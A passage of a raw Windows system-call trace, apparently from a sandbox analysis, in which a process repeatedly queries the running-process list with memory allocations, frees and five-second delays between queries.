RegionSize=0xdea54*=0x20000) returned 0x0 [0250.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.514] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.619] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.629] 